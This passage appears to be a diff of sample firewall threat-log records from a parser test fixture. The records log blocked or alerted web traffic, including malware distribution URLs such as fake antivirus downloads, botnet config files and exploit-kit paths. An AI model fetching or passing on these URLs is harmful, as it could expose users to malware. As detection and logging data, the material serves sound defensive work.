04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0, -Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 
04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 
23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:12 1,2013/03/25 
23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 
1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 
08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 
03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 
04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 
